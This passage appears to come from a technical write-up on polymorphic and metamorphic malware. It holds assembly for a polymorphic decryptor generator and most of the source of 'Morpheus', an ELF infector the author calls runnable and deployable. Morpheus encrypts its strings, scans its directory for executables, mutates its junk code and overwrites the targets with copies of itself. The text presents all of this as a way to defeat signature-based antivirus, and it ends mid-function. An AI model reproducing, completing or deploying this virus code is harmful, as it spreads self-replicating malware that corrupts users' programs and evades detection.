call gen_xor_mem_key
jmp .gen_loop_end
.gen_algo_1:
; xor/rol/xor
call gen_xor_mem_key
call trash
call gen_trash
call gen_rol_mem_16
call trash
call gen_trash
call gen_xor_mem_key
jmp .gen_loop_end
.gen_algo_2:
; sub/ror/xor
call gen_sub_mem_key
call trash
call gen_trash
call gen_ror_mem_16
call trash
call gen_trash
call gen_xor_mem_key
jmp .gen_loop_end
.gen_algo_3:
; xor/add/xor
call gen_xor_mem_key
call trash
call gen_trash
call gen_add_mem_key
call trash
call gen_trash
call gen_xor_mem_key
.gen_loop_end:
call trash
call gen_jmp
mov al, ADD_REG_IMM8
stosb
mov al, 0xC0
add al, [rel reg_base]
stosb
mov al, 8
stosb
call trash
call gen_jmp
; generate DEC instruction
movzx rax, byte [rel reg_count]
cmp al, 8
jb .dec_no_rex
mov al, 0x49 ; rex.wb for r8-r15
stosb
movzx rax, byte [rel reg_count]
sub al, 8
jmp .dec_encode
.dec_no_rex:
mov al, 0x48 ; rex.w for rax-rdi
stosb
movzx rax, byte [rel reg_count]
.dec_encode:
mov ah, 0xFF
xchg al, ah
stosw
mov al, 0xC8
add al, [rel reg_count]
and al, 7
stosb
mov al, TEST_REG_REG
stosb
mov al, [rel reg_count]
shl al, 3
add al, [rel reg_count]
add al, 0xC0
stosb
mov ax, JNZ_LONG
stosw
mov rax, [rel jmp_back]
sub rax, rdi
sub rax, 4
neg eax
stosd
ret
; algorithm generators
gen_add_mem_key:
call gen_jmp
mov al, ADD_MEM_REG
stosb
mov dl, [rel reg_key]
shl dl, 3
mov al, [rel reg_base]
add al, dl
stosb
ret
gen_sub_mem_key:
call gen_jmp
mov al, 0x48
stosb
mov al, 0x29
stosb
mov dl, [rel reg_key]
shl dl, 3
mov al, [rel reg_base]
add al, dl
stosb
ret
gen_xor_mem_key:
call gen_jmp
mov ax, XOR_MEM_REG
mov dl, [rel reg_key]
shl dl, 3
mov ah, [rel reg_base]
add ah, dl
stosw
ret
gen_rol_mem_16:
call gen_jmp
mov al, 0x48
stosb
mov ax, ROL_MEM_IMM
add ah, [rel reg_base]
stosw
mov al, 16
stosb
ret
gen_ror_mem_16:
call gen_jmp
mov al, 0x48
stosb
mov al, 0xC1
stosb
mov al, 0x08
add al, [rel reg_base]
stosb
mov al, 16
stosb
ret
; basic junk
trash:
call yes_no
test rax, rax
jz .skip_push_pop
movzx rax, byte [rel junk_reg1] ; push/pop junk
cmp al, 8
jb .push_no_rex
mov al, 0x41
stosb
movzx rax, byte [rel junk_reg1]
sub al, 8
.push_no_rex:
add al, PUSH_REG
stosb
movzx rax, byte [rel junk_reg2]
cmp al, 8
jb .pop_no_rex
mov al, 0x41
stosb
movzx rax, byte [rel junk_reg2]
sub al, 8
.pop_no_rex:
add al, POP_REG
stosb
.skip_push_pop:
call gen_jmp
ret
; jumps
gen_jmp:
call yes_no
test rax, rax
jz .short_jmp
mov al, JMP_REL32
stosb
mov eax, 1
stosd
call next_random
and al, 0xFF
stosb
jmp .jmp_exit
.short_jmp:
mov al, JMP_SHORT
stosb
mov al, 1
stosb
call next_random
and al, 0xFF
stosb
.jmp_exit:
ret
; self-modifying junk
gen_self:
mov al, CALL_REL32
stosb
mov eax, 3
stosd
mov al, JMP_REL32
stosb
mov ax, 0x04EB
stosw
call next_random
and rax, 2
lea rdx, [rel junk_reg1]
movzx rdx, byte [rdx + rax]
mov al, POP_REG
add al, dl
stosb
mov al, 0x48
stosb
mov al, 0xFF
stosb
mov al, 0xC0
add al, dl
stosb
mov al, PUSH_REG
add al, dl
stosb
mov al, RET_OPCODE
stosb
ret
; advanced junk procedures
gen_trash:
call yes_no
test rax, rax
jz .try_proc2
mov al, CALL_REL32
stosb
mov eax, 2
stosd
mov ax, 0x07EB
stosw
mov al, 0x55
stosb
mov al, 0x48
stosb
mov al, 0x89
stosb
mov al, 0xE5
stosb
mov ax, FNINIT_OPCODE
stosw
mov al, 0x5D
stosb
mov al, RET_OPCODE
stosb
jmp .exit_trash
.try_proc2:
call yes_no
test rax, rax
jz .try_proc3
mov al, CALL_REL32
stosb
mov eax, 2
stosd
mov ax, 0x0AEB
stosw
mov al, 0x60
stosb
mov eax, 0xD12BC333
stosd
mov eax, 0x6193C38B
stosd
mov al, 0x61
stosb
mov al, RET_OPCODE
stosb
jmp .exit_trash
.try_proc3:
call yes_no
test rax, rax
jz .exit_trash
mov al, CALL_REL32
stosb
mov eax, 2
stosd
mov eax, 0x525010EB
stosd
mov ax, 0xC069
stosw
mov eax, 0x90
stosd
mov al, 0x2D
stosb
mov eax, 0xDEADC0DE
stosd
mov ax, 0x585A
stosw
mov al, RET_OPCODE
stosb
.exit_trash:
ret
; dummy procedures
gen_dummy:
call yes_no
test rax, rax
jz .skip_dummy
mov al, CALL_REL32
stosb
mov eax, 15
stosd
mov al, 0x48
stosb
mov al, TEST_REG_REG
stosb
mov al, 0xC0
stosb
mov al, JZ_SHORT
stosb
mov al, 8
stosb
mov al, 0x55
stosb
mov al, 0x48
stosb
mov al, 0x89
stosb
mov al, 0xE5
stosb
mov ax, FNINIT_OPCODE
stosw
mov ax, FNOP_OPCODE
stosw
call next_random
and rax, 0xFF
mov al, 0x48
stosb
mov al, 0xB8
stosb
stosq
mov al, 0x5D
stosb
mov al, RET_OPCODE
stosb
.skip_dummy:
ret
; execute generated stub
exec_c:
push rbp
mov rbp, rsp
sub rsp, 32
push rbx
push r12
push r13
push r14
push r15
mov r12, rdi ; stub code
mov r13, rsi ; stub size
mov r14, rdx ; payload data
; validate input
test r12, r12
jz .error
test r13, r13
jz .error
cmp r13, 1
jb .error
cmp r13, 65536
ja .error
mov rax, 9 ; mmap
mov rdi, 0
mov rsi, r13
add rsi, 4096 ; padding
mov rdx, 0x7 ; rwx
mov r10, 0x22 ; private|anon
mov r8, -1
mov r9, 0
syscall
cmp rax, -1
je .error
test rax, rax
jz .error
mov rbx, rax
; copy stub to executable memory
mov rdi, rbx
mov rsi, r12
mov rcx, r13
rep movsb
; execute stub
cmp rbx, 0x1000
jb .error
call rbx
; cleanup
mov rax, 11 ; munmap
mov rdi, rbx
mov rsi, r13
add rsi, 4096
syscall
mov rax, 1 ; success
jmp .done
.error:
xor rax, rax
.done:
pop r15
pop r14
pop r13
pop r12
pop rbx
add rsp, 32
pop rbp
ret
Current Limitations
At present, it is strictly limited to Linux x64 because of direct syscall dependencies: the mmap usage is customized for Linux, and register conventions are bound to x64. Porting to Windows would require adapting calling conventions and likely rewriting large parts of the engine logic. macOS has its own syscall numbers and memory protection details, so it would not run with simple changes.
The algorithm set is deliberately limited to four variants. This scale is sufficient to prove the concept without making the system overly complex or fragile. Expanding to dozens of equivalent variants is feasible but significantly increases the risk of introducing bugs and requires careful balancing of complexity and correctness.
There is currently no runtime recompilation mechanism: each variant is generated once and remains static during execution. Self-modifying variants could further improve evasion but introduce instability and substantially raise implementation cost.
Future directions could include:
- Adding a syscall abstraction layer for true cross-platform support (Linux, Windows, macOS).
- Expanding the algorithm set and improving encryption/obfuscation (currently quite crude in this area).
- Building a dynamic rewriting engine that supports self-modifying payloads.
Even in its current form, it has already achieved the core goals: functional correctness, deep signature diversity, entropy-driven key generation, intelligent junk injection, and multi-layered polymorphic structure. Implementation details can vary, but these foundational principles remain stable.
This is a foundational polymorphic engine, intentionally designed to be “usable and clear.” You can use it first to understand the core techniques, then build upon it. Once you internalize these layers of entropy, obfuscation, and instruction encoding, you can take it in any direction you choose.
What Truly Makes Code Mutable
Metamorphic code is more than obfuscation — it rewrites itself. On every execution, it parses its own binary, locates mutable regions, and replaces them with semantically equivalent but syntactically different instruction sequences.
For a simple task like clearing a register, you can use XOR RAX, RAX, SUB RAX, RAX, MOV RAX, 0, or even PUSH 0; POP RAX. Same effect, different opcodes. To a static scanner, these are often unrelated.
A metamorphic engine exploits this by maintaining an instruction-level replacement catalog. Each iteration applies randomized transformations: register renaming, safe reordering of instructions, junk code insertion, and control-flow reconstruction. Logic remains unchanged, but layout continuously evolves.
Combined with replication propagation, each infected binary carries mutations from its “parent” and adds new mutations during infection. Over time, this creates a family of functionally equivalent but structurally distinct samples. No fixed signatures, no stable patterns — only continuous evolution at the opcode level. This is why it is often called “assembly heaven.”
Classic Reference: MetaPHOR
In 2002, there was a very solid article dissecting metamorphic engine structure: The Mental Driller’s “How I Made MetaPHOR and What I’ve Learned.” Yes, 2002 — ancient by today’s standards, but the core principles remain strikingly relevant. Some adaptation is needed for modern systems, but the underlying mechanisms are still solid.
Polymorphism focuses on camouflage: adjusting the decryptor, wrapping the payload, keeping the core static. Metamorphism discards the shell and directly modifies the interior. It disassembles complete code blocks, rewrites them from scratch, and reassembles the binary — producing new logical layouts, altered control flow, and shifted instruction patterns. Every landing looks different.
It is not just renaming registers or sprinkling NOPs. It is full-code-level mutation — deep structural churning that leaves no stable anchor points for static fingerprints.
— Disassembly and Shrinking —
To mutate, a virus (VX) must first disassemble itself into an internal pseudo-assembly format — a custom abstraction layer that makes original opcodes readable and transformable. It breaks apart its instruction stream, decodes jumps, calls, and conditional branches, then maps control flow into manageable data structures.
After disassembly, the code is written into a memory buffer. Pointer tables are built for jump targets, call destinations, and other critical control elements to ensure relationships are not broken during rewriting.
Next comes the shrinker. This stage scans for bloated instruction sequences and compresses them into minimal equivalent forms.
| Original Instruction | Compressed Instruction | Description |
|---|---|---|
| MOV reg, reg | NOP | Dead operation with no effect |
| XOR reg, reg | MOV reg, 0 | Clear the register |
The shrinker’s job is to trim fat: fold redundant chains, clean up leftovers, and free space for the next round of mutation.
— Permutation and Expansion —
After shrinking comes the permutator. Its task is shuffling: reordering instructions and injecting entropy while keeping logic intact, making layout unpredictable.
It also replaces equivalent instructions: same result, different operation.
Following permutation is the expander — the opposite of the shrinker. It expands single instructions into equivalent two- or three-instruction sequences. Recursive expansion continuously increases code complexity.
Control variables impose hard limits to prevent unbounded growth.
Finally, the assembler finishes the job: it reassembles the mutated code back into valid machine code.
Only after completing this loop does the VX become a structurally unique but functionally complete new variant. Payload unchanged, appearance brand new.
— Generational Generation —
You have seen how we do this in polymorphism: injecting junk code and replacing registers. Metamorphic thinking is similar but goes much deeper.
When the VX completes its self-rewrite in memory, it writes the new variant back to disk. Every execution produces a “new copy” containing random junk code and rewritten logic.
vx-junk-disasm
Notice those JUNK macro calls? They are randomly scattered. Each is a marker — a hook point that can be safely modified. Smart Trash: deliberately useless, designed specifically to interfere with disassemblers and scanners.
We use a dedicated scanning function to handle them. It traverses the code, looks for PUSH/POP patterns on the same registers (spaced 8 bytes apart), and marks the hit locations. Once marked, these junk segments are overwritten with new, harmless, randomized replacement sequences.
This loop is the core. It hunts for JUNK sequences and replaces them with new random instruction chains on every run. Each JUNK call marks a modifiable slot — essentially a sandboxed code region for generational mutation. Behavior harmless, structure chaotic.
After mutation completes, the VX propagates by copying the new variant into executable files discovered in the same directory. The copy has changed structure but unchanged behavior. True polymorphic/metamorphic malware is not about “fooling AV once,” but about continuous mutation — reshaping the binary with every “breath.” As long as logic remains intact and structure keeps changing, static detection struggles to gain a foothold.
This is only the minimal viable set, covering the key mechanisms. It demonstrates the core path that allows VX code to mutate and survive. There is much more to deeper content, but this is the foundation.
Morpheus
Now it is time for the code I mentioned alongside Veil64 to make its appearance.
Morpheus applies metamorphic principles to a real, runnable virus infector. This is not a theoretical demonstration — it is practical and deployable. It shows how a mutation engine can work end-to-end without relying on encryptors or packers.
The core idea is simple: Morpheus treats its own executable code the way a crypter treats a payload. It loads itself into memory, scans for known patterns, applies transformations, then writes out a mutated version that accomplishes the same tasks with different instruction sequences.
On every run, Morpheus roughly does the following:
- Extracts obfuscated strings and executes its logic
- Loads its own
.textsection - Disassembles code blocks
- Identifies mutation points (NOPs, junk patterns, simple MOV/XOR operations, etc.)
- Applies transformations (register shuffling, instruction replacement, code block reordering or expansion)
- Generates structurally different but logically consistent code
- Writes the mutated binary to a new target (usually another ELF in the same directory)
- Patches headers as needed to keep it executable
Every generation is truly different — not just added junk and register swaps, but substantive structural change — while the payload and functionality remain fully intact. This allows Morpheus to self-replicate on every execution, rendering static signature detection unreliable. Combined with runtime transformation and actual rewriting of files on disk, traditional scanning methods struggle to track it consistently.
Junk code is always a balancing act. In Veil64 we used relatively basic junk padding. Here is a 10-byte sequence that has zero net effect but can easily be mistaken for compiler-generated register preservation code:
PUSH RAX
PUSH RBX
XCHG RAX, RBX
XCHG RAX, RBX
POP RBX
POP RAX
Morpheus makes heavy use of such sequences. The JUNK macro marks these blocks, and on every execution the engine scans and replaces them with structurally different but functionally equivalent junk patterns.
We implemented four register combinations for smart junk patterns. Each variant follows the same logic but uses different register pairs, producing unique byte sequences. These variants are functionally identical with zero side effects, yet their binary signatures change completely.
String Encryption
All strings are encrypted to evade static signature detection. I used a simple XOR scheme: each string gets its own key, and decryption is a single XOR pass. Why XOR? Because it is fast.
Decryption runs once at startup. To add extra resistance, I included INT3 trap shellcode to disrupt debugger flow.
— Infection —
During the infection stage, we scan the directory for ELF binaries. The scanner performs several basic checks to filter out garbage files and retain only viable ELF executable targets (regular files, no hidden files, valid ELF magic, executable and writable permissions).
Before any overwrite, it creates a hidden backup prefixed with .morph8. If the backup already exists, infection is skipped — acting as an “already morphed” marker.
— Morpheus Engine —
;;
;; M O R P H E U S [ polymorphic ELF infector ]
;; ------------------------------------------------
;; stealth // mutation // syscall-only // junked //
;; ------------------------------------------------
;; 0xBADC0DE // .morph8 // Linux x86_64 // 0xf00sec
;;
%define PUSH 0x50
%define POP 0x58
%define MOV 0xB8
%define NOP 0x90
%define REX_W 0x48
%define XCHG_OP 0x87
%define XCHG_BASE 0xC0
%define ADD_OP 0x01
%define AND_OP 0x21
%define XOR_OP 0x31
%define OR_OP 0x09
%define SBB_OP 0x19
%define SUB_OP 0x29
%define JUNKLEN 10
; push rax,rbx; xchg rax,rbx; xchg rax,rbx; pop rbx,rax
%macro JUNK 0
db 0x50, 0x53, 0x48, 0x87, 0xC3, 0x48, 0x87, 0xC3, 0x5B, 0x58
%endmacro
section .data
; ELF header
ELF_MAGIC dd 0x464C457F
ELF_CLASS64 equ 2
ELF_DATA2LSB equ 1
ELF_VERSION equ 1
ELF_OSABI_SYSV equ 0
ET_EXEC equ 2
ET_DYN equ 3
EM_X86_64 equ 62
prefixes db ADD_OP, AND_OP, XOR_OP, OR_OP, SBB_OP, SUB_OP, 0
bin_name times 256 db 0
orig_exec_name times 256 db 0
msg_cat db " /\_/\ ",10
db "( o.o )",10
db " > ^ <",10,0 ; payload
current_dir db "./",0
; encrypted strings
cmhd db 0x36, 0x3D, 0x38, 0x3A, 0x31, 0x75, 0x7E, 0x2D, 0x75, 0x70, 0x26, 0x55 ; "chmod +x %s"
tchh db 0xAF, 0xA4, 0xA1, 0xA3, 0xA8, 0xEC, 0xE7, 0xB4, 0xEC, 0xE9, 0xBF, 0xCC ; "chmod +x %s"
touc db 0xDE, 0xC5, 0xDF, 0xC9, 0xC2, 0x8A, 0x8F, 0xD9, 0xAA ; "touch %s"
cpcm db 0x9C, 0x8F, 0xDF, 0xDA, 0x8C, 0xDF, 0xDA, 0x8C, 0xFF ; "cp %s %s"
hidd db 0x59, 0x1A, 0x18, 0x05, 0x07, 0x1F, 0x4F, 0x77 ; ".morph8"
exec db 0x1D, 0x1C, 0x16, 0x40, 0x33 ; "./%s"
vxxe db 0xFE, 0xF0, 0xF0, 0x88 ; "vxx"
xor_keys db 0xAA, 0x55, 0xCC, 0x33, 0xFF, 0x88, 0x77
vierge_val db 1 ; first generation marker
signme dd 0xF00C0DE ; PRNG seed
section .bss
code resb 65536 ; viral body
codelen resq 1
vierge resb 1 ; generation flag
dir_buf resb 4096
temp_buf resb 1024
elf_header resb 64
; runtime decrypted strings
touch_cmd_fmt resb 32
chmod_cmd_fmt resb 32
touch_chmod_fmt resb 32
exec_cmd_fmt resb 32
cp_cmd_fmt resb 32
vxx_str resb 8
hidden_prefix resb 16
section .text
global _start
%define SYS_read 0
%define SYS_write 1
%define SYS_open 2
%define SYS_close 3
%define SYS_exit 60
%define SYS_lseek 8
%define SYS_getdents64 217
%define SYS_access 21
%define SYS_getrandom 318
%define SYS_execve 59
%define SYS_fstat 5
%define SYS_mmap 9
%define SYS_brk 12
%define SYS_fork 57
%define SYS_wait4 61
%define F_OK 0
%define X_OK 1
%define W_OK 2
%define O_RDONLY 0
%define O_WRONLY 1
%define O_RDWR 2
%define O_CREAT 64
%define O_TRUNC 512
%define PROT_READ 1
%define PROT_WRITE 2
%define MAP_PRIVATE 2
%define MAP_ANONYMOUS 32
section .rodata
shell_path db "/bin/sh",0
sh_arg0 db "sh",0
sh_arg1 db "-c",0
; syscall wrappers with junk insertion
sys_write:
mov rax, SYS_write
JUNK
syscall
ret
sys_read:
mov rax, SYS_read
JUNK
syscall
ret
sys_open:
mov rax, SYS_open
JUNK
syscall
ret
sys_close:
mov rax, SYS_close
syscall
ret
sys_lseek:
mov rax, SYS_lseek
syscall
ret
sys_access:
mov rax, SYS_access
syscall
ret
sys_getdents64:
mov rax, SYS_getdents64
syscall
ret
sys_exit:
mov rax, SYS_exit
syscall
; validate ELF executable target
is_elf:
push r12
push r13
mov rsi, O_RDONLY
xor rdx, rdx
call sys_open
test rax, rax
js .not_elf
mov r12, rax
mov rdi, r12
mov rsi, elf_header
mov rdx, 64
call sys_read
push rax
mov rdi, r12
call sys_close
pop rax
cmp rax, 64
jl .not_elf
; validate ELF magic
mov rsi, elf_header
cmp dword [rsi], 0x464C457F
jne .not_elf
; 64-bit only
cmp byte [rsi + 4], 2
jne .not_elf
; executable or shared object
mov ax, [rsi + 16]
cmp ax, 2
je .valid
cmp ax, 3
jne .not_elf
.valid:
mov rax, 1
jmp .done
.not_elf:
xor rax, rax
.done:
pop r13
pop r12
ret
; string utilities
basename: ; extract filename from path
mov rax, rdi
mov rsi, rdi
.find_last_slash:
mov bl, [rsi]
cmp bl, 0
je .done
cmp bl, '/'
jne .next_char
inc rsi
mov rax, rsi
jmp .find_last_slash
.next_char:
inc rsi
jmp .find_last_slash
.done:
ret
strlen:
mov rdi, rdi
xor rcx, rcx
.strlen_loop:
cmp byte [rdi + rcx], 0
je .strlen_done
inc rcx
jmp .strlen_loop
.strlen_done:
mov rax, rcx
ret
strcpy:
mov rdi, rdi
mov rsi, rsi
mov rax, rdi
.cp_loop:
mov bl, [rsi]
mov [rdi], bl
inc rdi
inc rsi
cmp bl, 0
jne .cp_loop
ret
strcmp:
push rdi
push rsi
.cmp_loop:
mov al, [rdi]
mov bl, [rsi]
cmp al, bl
jne .not_equal
test al, al
jz .equal
inc rdi
inc rsi
jmp .cmp_loop
.equal:
xor rax, rax
jmp .done
.not_equal:
movzx rax, al
movzx rbx, bl
sub rax, rbx
.done:
pop rsi
pop rdi
ret
strstr:
mov r8, rdi
mov r9, rsi
mov al, [r9]
test al, al
jz .found
.scan:
mov bl, [r8]
test bl, bl
jz .not_found
cmp al, bl
je .check_match
inc r8
jmp .scan
.check_match:
mov r10, r8
mov r11, r9
.match_loop:
mov al, [r11]
test al, al
jz .found
mov bl, [r10]
test bl, bl
jz .not_found
cmp al, bl
jne .next_pos
inc r10
inc r11
jmp .match_loop
.next_pos:
inc r8
jmp .scan
.found:
mov rax, r8
ret
.not_found:
xor rax, rax
ret
; PRNG
get_random:
mov eax, [signme]
mov edx, eax
shr edx, 1
xor eax, edx
mov edx, eax
shr edx, 2
xor eax, edx
mov [signme], eax
ret
get_range: ; random in range 0-ecx
call get_random
xor edx, edx
div ecx
mov eax, edx
ret
; decrypt string with indexed key
d_strmain:
push rax
push rbx
push rcx
push rdx
push r8
mov r8, xor_keys
add r8, rcx
mov al, [r8]
mov rcx, rdx
; clear dest buffer
push rdi
push rcx
mov rdi, rsi
mov rcx, rdx
xor bl, bl
rep stosb
pop rcx
pop rdi
.d_loop:
test rcx, rcx
jz .d_done
mov bl, [rdi]
xor bl, al
mov [rsi], bl
inc rdi
inc rsi
dec rcx
jmp .d_loop
.d_done:
pop r8
pop rdx
pop rcx
pop rbx
pop rax
ret
; decrypt all strings at runtime
d_str:
push rdi
push rsi
push rdx
push rcx
mov rdi, touc
mov rsi, touch_cmd_fmt
mov rdx, 9
mov rcx, 0
call d_strmain
mov rdi, cmhd
mov rsi, chmod_cmd_fmt
mov rdx, 12
mov rcx, 1
call d_strmain
mov rdi, tchh
mov rsi, touch_chmod_fmt
mov rdx, 12
mov rcx, 2
call d_strmain
mov rdi, exec
mov rsi, exec_cmd_fmt
mov rdx, 5
mov rcx, 3
call d_strmain
mov rdi, cpcm
mov rsi, cp_cmd_fmt
mov rdx, 9
mov rcx, 4
call d_strmain
mov rdi, vxxe
mov rsi, vxx_str
mov rdx, 4
mov rcx, 5
call d_strmain
mov rdi, hidd
mov rsi, hidden_prefix
mov rdx, 8
mov rcx, 6
call d_strmain
pop rcx
pop rdx
pop rsi
pop rdi
ret
; 4 variants
spawn_junk:
push rbx
push rcx
push rdx
push r8
mov r8, rdi ; dst buffer
call get_random
and eax, 3 ; 4 variants
cmp eax, 0
je .variant_0
cmp eax, 1
je .variant_1
cmp eax, 2
je .variant_2
jmp .variant_3
.variant_0:
; push rax,rbx; xchg rax,rbx; xchg rax,rbx; pop rbx,rax
mov byte [r8], 0x50
mov byte [r8+1], 0x53
mov byte [r8+2], 0x48
mov byte [r8+3], 0x87
mov byte [r8+4], 0xC3
mov byte [r8+5], 0x48
mov byte [r8+6], 0x87
mov byte [r8+7], 0xC3
mov byte [r8+8], 0x5B
mov byte [r8+9], 0x58
jmp .done
.variant_1:
; push rcx,rdx; xchg rcx,rdx; xchg rcx,rdx; pop rdx,rcx
mov byte [r8], 0x51
mov byte [r8+1], 0x52
mov byte [r8+2], 0x48
mov byte [r8+3], 0x87
mov byte [r8+4], 0xCA
mov byte [r8+5], 0x48
mov byte [r8+6], 0x87
mov byte [r8+7], 0xCA
mov byte [r8+8], 0x5A
mov byte [r8+9], 0x59
jmp .done
.variant_2:
; push rax,rcx; xchg rax,rcx; xchg rax,rcx; pop rcx,rax
mov byte [r8], 0x50
mov byte [r8+1], 0x51
mov byte [r8+2], 0x48
mov byte [r8+3], 0x87
mov byte [r8+4], 0xC1
mov byte [r8+5], 0x48
mov byte [r8+6], 0x87
mov byte [r8+7], 0xC1
mov byte [r8+8], 0x59
mov byte [r8+9], 0x58
jmp .done
.variant_3:
; push rbx,rdx; xchg rbx,rdx; xchg rbx,rdx; pop rdx,rbx
mov byte [r8], 0x53
mov byte [r8+1], 0x52
mov byte [r8+2], 0x48
mov byte [r8+3], 0x87
mov byte [r8+4], 0xD3
mov byte [r8+5], 0x48
mov byte [r8+6], 0x87
mov byte [r8+7], 0xD3
mov byte [r8+8], 0x5A
mov byte [r8+9], 0x5B
.done:
pop r8
pop rdx
pop rcx
pop rbx
ret
; file I/O
read_f:
push r12
push r13
push r14
push r15
mov r15, rsi ; save buffer pointer
mov rax, SYS_open
mov rsi, O_RDONLY
xor rdx, rdx
syscall
test rax, rax
js .error
mov r12, rax
mov rax, SYS_fstat
mov rdi, r12
sub rsp, 144
mov rsi, rsp
syscall
test rax, rax
js .close_e
mov r13, [rsp + 48] ; file size from stat
add rsp, 144
; bounds check
cmp r13, 65536
jle .size_ok
mov r13, 65536
.size_ok:
test r13, r13
jz .empty
xor r14, r14 ; bytes read cnt
.read_loop:
mov rax, SYS_read
mov rdi, r12
mov rsi, r15
add rsi, r14 ; offset into buffer
mov rdx, r13
sub rdx, r14 ; remaining bytes to read
jz .read_done
syscall
test rax, rax
jle .read_done ; EOF or error
add r14, rax
cmp r14, r13
jl .read_loop
.read_done:
mov rax, SYS_close
mov rdi, r12
syscall
mov rax, r14 ; return bytes read
jmp .done
.empty:
mov rax, SYS_close
mov rdi, r12
syscall
xor rax, rax
.done:
pop r15
pop r14
pop r13
pop r12
ret
.close_e:
add rsp, 144
mov rax, SYS_close
mov rdi, r12
syscall
.error:
mov rax, -1
pop r15
pop r14
pop r13
pop r12
ret
write_f:
push rbp
mov rbp, rsp
push r12
push r13
push r14
push r15
mov r12, rdi ; filename
mov r13, rsi ; buffer
mov r14, rdx ; size
; validate inputs
test r12, r12
jz .write_er
test r13, r13
jz .write_er
test r14, r14
jz .write_s
mov rdi, r12
mov rsi, O_WRONLY | O_CREAT | O_TRUNC
mov rdx, 0755o
call sys_open
cmp rax, 0
jl .write_er
mov r12, rax ; fd
xor r15, r15 ; bytes written cnt
.write_lp:
mov rdi, r12
mov rsi, r13
add rsi, r15 ; offset into buffer
mov rdx, r14
sub rdx, r15 ; remaining bytes
jz .write_c
call sys_write
JUNK
test rax, rax
jle .r_close
add r15, rax
cmp r15, r14
jl .write_lp
.write_c:
mov rdi, r12
call sys_close
.write_s:
xor rax, rax ; success
pop r15
pop r14
pop r13
pop r12
pop rbp
ret
.r_close:
mov rdi, r12
call sys_close
.write_er:
mov rax, -1
pop r15
pop r14
pop r13
pop r12
pop rbp
ret
; instruction generator
trace_op:
; bounds check
mov rax, [codelen]
cmp rsi, rax
jae .bounds_er
mov r8, code
add r8, rsi
; instruction size check
mov rax, [codelen]
sub rax, rsi
cmp rax, 3
jae .rex_xchg
cmp rax, 2
jae .write_prefix
cmp rax, 1
jae .write_nop
.bounds_er:
xor eax, eax
ret
.write_nop:
mov byte [r8], NOP
mov eax, 1
ret
.write_prefix:
; validate register (0-3 only)
cmp dil, 3
ja .bounds_er
call get_random
and eax, 5
movzx eax, byte [prefixes + rax]
mov [r8], al
call get_random
and eax, 3 ; rax,rbx,rcx,rdx only
shl eax, 3
add eax, 0xC0
add al, dil
mov [r8 + 1], al
mov eax, 2
ret
.rex_xchg:
; generate REX.W XCHG
cmp dil, 3
ja .bounds_er
; get different register
call get_random
and eax, 3
cmp al, dil
je .rex_xchg ; retry if same
; build REX.W XCHG r1, r2
mov byte [r8], REX_W
mov byte [r8 + 1], XCHG_OP
; ModR/M byte
mov bl, XCHG_BASE
mov cl, al
shl cl, 3
add bl, cl
add bl, dil
mov [r8 + 2], bl
mov eax, 3
ret
; instruction decoder
trace_jmp:
push rbx
push rcx
cmp rsi, [codelen]
jae .invalid
mov r8, code
mov al, [r8 + rsi]
; check for NOP
cmp al, NOP
je .ret_1
; check MOV+reg
mov bl, MOV
add bl, dil
cmp al, bl
je .ret_5
; check prefix instruction
mov rbx, prefixes
.check_prefix:
mov cl, [rbx]
test cl, cl
jz .invalid
cmp cl, al
je .check_second_byte
inc rbx
jmp .check_prefix
.check_second_byte:
inc rsi
cmp rsi, [codelen]
jae .invalid
mov al, [r8 + rsi]
cmp al, 0xC0
jb .invalid
cmp al, 0xFF
ja .invalid
and al, 7
cmp al, dil
jne .invalid
.ret_2:
mov eax, 2
jmp .done
.ret_1:
mov eax, 1
jmp .done
.ret_5:
mov eax, 5
jmp .done
.invalid:
xor eax, eax
.done:
pop rcx
pop rbx
ret
; junk mutation engine
replace_junk:
push r12
push r13
push r14
push r15
mov r8, [codelen]
test r8, r8
jz .done
cmp r8, JUNKLEN
jle .done
sub r8, JUNKLEN
mov r9, code
xor r12, r12
.scan_loop:
cmp r12, r8
jae .done
mov rax, [codelen]
cmp r12, rax
jae .done
; scan for junk pattern
movzx eax, byte [r9 + r12]
cmp al, PUSH
jb .next_i
cmp al, PUSH + 3 ; rax,rbx,rcx,rdx only
ja .next_i
; second byte must be PUSH
movzx ebx, byte [r9 + r12 + 1]
cmp bl, PUSH
jb .next_i
cmp bl, PUSH + 3
ja .next_i
; check REX.W prefix
cmp byte [r9 + r12 + 2], REX_W
jne .next_i
; check XCHG opcode
cmp byte [r9 + r12 + 3], XCHG_OP
jne .next_i
; validate complete sequence
call validate
test eax, eax
jz .next_i
; replace with new junk
call insert
.next_i:
inc r12
jmp .scan_loop
.done:
pop r15
pop r14
pop r13
pop r12
ret
; validate junk pattern
validate:
push rbx
push rcx
; extract registers from PUSH
movzx eax, byte [r9 + r12]
sub al, PUSH
mov bl, al ; reg1
movzx eax, byte [r9 + r12 + 1]
sub al, PUSH
mov cl, al ; reg2
; registers must differ
cmp bl, cl
je .invalid
; check POP sequence (reversed)
movzx eax, byte [r9 + r12 + 8]
sub al, POP
cmp al, cl
jne .invalid
movzx eax, byte [r9 + r12 + 9]
sub al, POP
cmp al, bl
jne .invalid
mov eax, 1 ; Valid sequence
jmp .done
.invalid:
xor eax, eax
.done:
pop rcx
pop rbx
ret
; insert new junk sequence
insert:
push rdi
mov rdi, r9
add rdi, r12
call spawn_junk
pop rdi
ret
;; shell command execution
exec_sh:
sub rsp, 0x40
mov qword [rsp], sh_arg0_ptr
mov qword [rsp+8], rdi
mov qword [rsp+16], 0
mov rsi, rsp
xor rdx, rdx
mov rdi, shell_path
mov rax, SYS_execve
syscall
mov rdi, 1
call sys_exit
sh_arg0_ptr: dq sh_arg0
sh_arg1_ptr: dq sh_arg1
list: ; scan directory for infection targets
push rbp
mov rbp, rsp
push r12
push r13
push r14
push r15
mov r14, rsi
mov rdi, current_dir
mov rsi, O_RDONLY
mov rdx, 0
call sys_open
cmp rax, 0
jl .list_error
mov r12, rax
.list_loop:
mov rdi, r12
mov rsi, dir_buf
mov rdx, 4096
call sys_getdents64
cmp rax, 0
je .list_done
mov r13, rax
xor r15, r15
.list_entry:
cmp r15, r13
jge .list_loop
mov rdi, dir_buf
add rdi, r15
mov r8, rdi
add r8, 16
movzx rax, word [r8] ; d_reclen at offset 16
cmp rax, 19
jl .skip_entry
cmp rax, 4096
jg .skip_entry
push rax
mov r8, rdi
add r8, 18
mov cl, [r8]
cmp cl, 8
jne .skip_entry
add rdi, 19
cmp byte [rdi], '.'
jne .check_file
mov r8, rdi
inc r8
cmp byte [r8], 0
je .skip_entry
mov r8, rdi
inc r8
cmp byte [r8], '.'
je .skip_entry
.check_file:
push rdi
mov rdi, r14
call basename
